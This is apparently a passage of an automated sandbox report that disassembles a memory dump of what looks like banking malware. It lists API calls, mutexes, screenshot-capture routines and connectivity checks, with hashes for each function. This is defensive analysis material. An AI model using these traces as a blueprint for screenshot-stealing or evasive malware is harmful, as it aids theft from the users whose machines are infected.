                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C165$IBANK$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw
                                                                                                                                                                                                              • API String ID: 2736094147-1605467058
                                                                                                                                                                                                              • Opcode ID: f564a909fbeb88d0d4f2385ce9ac80e4336a83e2611bd78f3040183e7b612be9
                                                                                                                                                                                                              • Instruction ID: f647022393e9e0270405959e87bef72afcdf2978081bf3403ce09fb44191bb48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f564a909fbeb88d0d4f2385ce9ac80e4336a83e2611bd78f3040183e7b612be9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E213A32686315BAE2327B688C06F5E77D8DF45BA8F10410DFA50771C0DBB4D60187AA
                                                                                                                                                                                                              Function 01301590 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 013015AC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 013015C2
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 013015D0
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013015D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 013015F7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301605
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00021320,00000000,00000000,00000000), ref: 0130161A
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 0130162B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01301630
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01301644
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301652
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 0130165D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C387,INTER), ref: 01301677
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C387$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw
                                                                                                                                                                                                              • API String ID: 2736094147-1452232652
                                                                                                                                                                                                              • Opcode ID: 4d6a00672f0cd00d6a377cccef17f08a4b38c01343f5368d1f8b8f6064a417c3
                                                                                                                                                                                                              • Instruction ID: 6ec81b100dabbe26a46520cd468984ddf1b33434e6962718aaf7b48621fce096
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d6a00672f0cd00d6a377cccef17f08a4b38c01343f5368d1f8b8f6064a417c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB2107316863157BE332BB658C06F5E77DC9F45B69F05420CFE00A62C4DBB0E50187AA
                                                                                                                                                                                                              Function 012E3DC7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 233timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3DED
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3E23
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3E57
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd;MMM;yyyy,?,00000104), ref: 012E3EA0
                                                                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH;mm;ss,?,00000104), ref: 012E3EC0
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,debug_%s_%s.log,?,?), ref: 012E3EE5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3F37
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3FB7
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4,00000000,?), ref: 012E404B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: EnterCriticalSection.KERNEL32(0132FB68,00000001,00000000,775B5CE0), ref: 012F39E9
                                                                                                                                                                                                                • Part of subcall function 012F39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 012F39FB
                                                                                                                                                                                                                • Part of subcall function 012F39D0: _snprintf.MSVCRT(?,00000104,%s%s,01339D68,0133D3A4), ref: 012F3A1B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 012F3A2B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: PathAddBackslashA.SHLWAPI(?), ref: 012F3B00
                                                                                                                                                                                                                • Part of subcall function 012E79C0: SetFileAttributesA.KERNEL32(?,00000000,012E4067,0133D3A4,DEBUG), ref: 012E79C8
                                                                                                                                                                                                                • Part of subcall function 012E79C0: DeleteFileA.KERNEL32(?), ref: 012E79CF
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 012E4072
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$CurrentDirectoryFileFormat_snprintf$AttributesCriticalDateDeleteEnterFreeSectionTimeVirtual
                                                                                                                                                                                                              • String ID: DEBUG$HH;mm;ss$dd;MMM;yyyy$debug_%s_%s.log$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 203013662-44577846
                                                                                                                                                                                                              • Opcode ID: 5c08b96834a9c27577cbd8d1fe81ee38832ff0945704990c4287dfe4672a37ca
                                                                                                                                                                                                              • Instruction ID: 736b37673a9d43795087d96d18640169b406bdbf37ebc32d955be7848cf0eff7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c08b96834a9c27577cbd8d1fe81ee38832ff0945704990c4287dfe4672a37ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D717D316106474FCF26EA3C5C697FABBE1BF85304F9441D8E989EB241DA719E48CB84
                                                                                                                                                                                                              Function 012E63F0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E6460
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 012E647A
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,?,00000000,00000103,?,00000000,00000103), ref: 012E6494
                                                                                                                                                                                                              • strtol.MSVCRT(774D0F10,00000000,00000010,00000000,00000000,774D0F10), ref: 012E650A
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,01326074,00000000,00000000), ref: 012E658A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$strstrstrtol
                                                                                                                                                                                                              • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                              • API String ID: 600650289-3097137778
                                                                                                                                                                                                              • Opcode ID: 2e81866e80abf6c2b2089491b6c4a99f5c0980ad164c5b231acc26a8e3b8b2cd
                                                                                                                                                                                                              • Instruction ID: 909b03552b5566922fd8b100d060409a612a7eebf0b604693c2b5e6f224e3c06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e81866e80abf6c2b2089491b6c4a99f5c0980ad164c5b231acc26a8e3b8b2cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D715A70A183555BDB31EF68DC85BDEBBF9AF68700F0480ACEA48A7285D3785745CB50
                                                                                                                                                                                                              Function 012E8320 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(00000000,00000000,774CF380,?,?,012E8212,00000000,00000000), ref: 012E833C
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,?,?,012E8212,00000000,00000000), ref: 012E8343
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000,?,?,012E8212,00000000,00000000), ref: 012E834F
                                                                                                                                                                                                                • Part of subcall function 012EDA20: GetTickCount.KERNEL32(00000000,00000000), ref: 012EDA2D
                                                                                                                                                                                                                • Part of subcall function 012EDA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 012EDA3E
                                                                                                                                                                                                                • Part of subcall function 012EDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0132F5A0), ref: 012EDA6A
                                                                                                                                                                                                                • Part of subcall function 012EDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDA83
                                                                                                                                                                                                                • Part of subcall function 012EDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0132F54C), ref: 012EDAB0
                                                                                                                                                                                                                • Part of subcall function 012EDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDAC3
                                                                                                                                                                                                                • Part of subcall function 012EDA20: CreateMutexA.KERNEL32(00000000,00000000,0132F670), ref: 012EDAE1
                                                                                                                                                                                                                • Part of subcall function 012EDA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012EDAFF
                                                                                                                                                                                                                • Part of subcall function 012EDA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 012EDB20
                                                                                                                                                                                                                • Part of subcall function 012EDA20: SetNamedSecurityInfoA.ADVAPI32(0132F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012EDB3D
                                                                                                                                                                                                                • Part of subcall function 012EDA20: LocalFree.KERNEL32(00000000), ref: 012EDB47
                                                                                                                                                                                                                • Part of subcall function 012EDC50: memset.MSVCRT(?,00000000,00000090,00000000,?), ref: 012EDC69
                                                                                                                                                                                                                • Part of subcall function 012EDC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 012EDC82
                                                                                                                                                                                                                • Part of subcall function 01309F50: malloc.MSVCRT(00000350,00000000,?,?,?,012E837F,?,?,?,?,?,012E8212,00000000,00000000), ref: 01309F62
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 012E83E7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 012E83F5
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,fuck), ref: 012E83FF
                                                                                                                                                                                                                • Part of subcall function 012F4F80: IsNetworkAlive.SENSAPI(012E6E0D,00000000), ref: 012F4F93
                                                                                                                                                                                                                • Part of subcall function 012F4F80: #680.SHELL32 ref: 012F4FA1
                                                                                                                                                                                                                • Part of subcall function 012F4F80: DnsFlushResolverCache.DNSAPI ref: 012F4FAB
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012F4FC8
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,774D0F10), ref: 012F4FE7
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 012F5000
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5013
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,?,00000000,774D0F10), ref: 012F502C
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,774D0F10), ref: 012F5045
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 012F5058
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5065
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 012E84A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 012E84B1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 012E84E0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E84EF
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E84FD
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 012E8506
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,00000000), ref: 012E854C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$#680AliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickVersionlstrcpymalloc
                                                                                                                                                                                                              • String ID: P0Mw$SYSTEM!841618!025F9049$fuck
                                                                                                                                                                                                              • API String ID: 2944798476-1586808242
                                                                                                                                                                                                              • Opcode ID: 50bbf5894df70c59dd7eecdfd29f5bd0f09cc5060971e47c9175f982044caf0e
                                                                                                                                                                                                              • Instruction ID: 1507e76a496138aa98fc85c639164e1954287c834b62a54893fc59fd077486af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50bbf5894df70c59dd7eecdfd29f5bd0f09cc5060971e47c9175f982044caf0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A451C2B51143029FE734AF68E84CFA63BECFB44325F55457DE6988B299CB71A404CB60
                                                                                                                                                                                                              Function 01303080 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 013030A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013030E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013030F5
                                                                                                                                                                                                              • #680.SHELL32 ref: 013030F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130310A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303111
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303142
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303148
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130314C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130315D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303164
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01303192
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 013031A8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C435$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1097404317
                                                                                                                                                                                                              • Opcode ID: 981c7cc244a79e82bac70d3e91950bcf373eaea4d53ab6583a91b110ab8b5ac7
                                                                                                                                                                                                              • Instruction ID: f4481e5df977f53def5614da3f432d336798a781a0d66cc4f41e2caf025a45a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 981c7cc244a79e82bac70d3e91950bcf373eaea4d53ab6583a91b110ab8b5ac7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E313A315042185FDB31EF789C68BEABBFCBF59705F444098E985D3244DAB0D984CBA0
                                                                                                                                                                                                              Function 01301320 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 01301347
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01301389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01301395
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301399
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013013AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013013B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013013E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013013E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 013013EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013013FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01301404
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01301432
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 01301448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C387$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-73659253
                                                                                                                                                                                                              • Opcode ID: 526959363c14f1df15f19371368c145c8c4d04e80b3ff1257db396e81aac423a
                                                                                                                                                                                                              • Instruction ID: 1aa7c248bd992f7def68d478ebba873cb9d9193795eabee66d7f40defcfb1961
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 526959363c14f1df15f19371368c145c8c4d04e80b3ff1257db396e81aac423a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73169315003285BDB32EF789C68BEABBECBF55704F444098EA85D3244DEB0D984CBA0
                                                                                                                                                                                                              Function 01302390 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487), ref: 013023B7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013023F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01302405
                                                                                                                                                                                                              • #680.SHELL32 ref: 01302409
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130241A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01302421
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01302452
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01302458
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130245C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130246D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01302474
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 013024A2
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 013024B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61c5c487$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-181139224
                                                                                                                                                                                                              • Opcode ID: ec41db23d5c35cba1b0948c4c20befa3ddd977d05860d0c92ecb87aff832df0d
                                                                                                                                                                                                              • Instruction ID: 3dfd201a9423ca77d49ceb82596837c2f515f074ab59245419c11d83fdd503dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec41db23d5c35cba1b0948c4c20befa3ddd977d05860d0c92ecb87aff832df0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E03126315042195BCB31AF789C6CBEBBBFCBF55704F554098EA84D3244DAB0D984CBA0
                                                                                                                                                                                                              Function 012FEDD0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3), ref: 012FEDFA
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FEE3C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FEE48
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FEE4C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FEE5D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FEE64
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FEE93
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FEE99
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FEE9D
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FEEAE
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FEEB5
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 012FEEEA
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 012FEF00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61c5c1a3$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1878464270
                                                                                                                                                                                                              • Opcode ID: 98cfc1e96da37aa31d381c573136270e0cbf6033182a98680c9f3f9319810d98
                                                                                                                                                                                                              • Instruction ID: 9dc14d8f4fcbebfc287878fd31a376e91899fcd0db5af027775f1be83ce183f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98cfc1e96da37aa31d381c573136270e0cbf6033182a98680c9f3f9319810d98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D531F8715002295BDB31AF78AC58BEABBECBF55710F4640ACEB85D3145DA70DA44CBA0
                                                                                                                                                                                                              Function 01300420 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165), ref: 01300447
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01300489
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01300495
                                                                                                                                                                                                              • #680.SHELL32 ref: 01300499
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013004AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013004B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013004E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013004E8
